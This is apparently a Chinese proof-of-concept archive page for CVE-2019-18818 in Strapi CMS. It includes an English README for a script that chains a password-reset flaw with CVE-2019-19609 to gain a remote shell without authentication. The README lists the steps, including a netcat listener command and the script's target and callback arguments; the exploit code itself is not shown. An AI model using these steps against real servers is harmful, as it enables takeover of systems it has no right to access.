关联漏洞
标题:strapi 授权问题漏洞 (CVE-2019-18818)Description:strapi是一套开源的无头内容管理系统(CMS)。 strapi 3.0.0-beta.17.5之前版本中存在安全漏洞,该漏洞源于程序没有正确处理packages/strapi-admin/controllers/Auth.js和packages/strapi-plugin-users-permissions/controllers/Auth.js文件中的密码重置。目前尚无此漏洞的相关信息,请随时关注CNNVD或厂商公告。
Description
Exploit script showcasing a mixture of CVE-2019-18818 and CVE-2019-19609 for unauthenticated remote code execution in Strapi CMS.
介绍
# Strapi-RCE
Exploit script showcasing a mixture of [CVE-2019-18818](https://www.exploit-db.com/exploits/50237) and [CVE-2019-19609](https://www.exploit-db.com/exploits/50238) for unauthenticated remote code execution in Strapi CMS.
## Exploit
This script exploits a vulnerability in Strapi CMS versions 3.0.0-beta.17.4 and lower, allowing for unauthenticated remote code execution.
## Description
The exploit works by first leveraging a password reset vulnerability to obtain a JSON Web Token (JWT) for an administrative user. This token is then used to send a malicious payload to the Strapi CMS, which triggers a reverse shell back to the attacker's machine.
## How to Use
1. **Clone the Repository:**
```sh
git clone https://github.com/Hackhoven/Strapi-RCE.git
```
2. **Navigate to the directory**
```sh
cd Strapi-RCE/
```
3. **Set up a Netcat Listener**
```sh
nc -nlvp <LPORT>
```
4. **Run the script with the target URL, local host ip address, and local host port as arguments**
```sh
python3 strapi-rce.py <TARGET_URL> <LHOST> <LPORT>
```
## Disclaimer
This script is intended for educational purposes only. The author does not condone or support the use of this script for illegal or unethical activities. This script should only be used in legal security research or CTF environments. Use at your own risk.
---
Made by [Hackhoven](https://github.com/Hakchoven)
文件快照
[4.0K] /data/pocs/617fae2aa6966ff2d7f93b15513506c581f940b2
├── [1.4K] README.md
└── [2.3K] strapi-rce.py
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。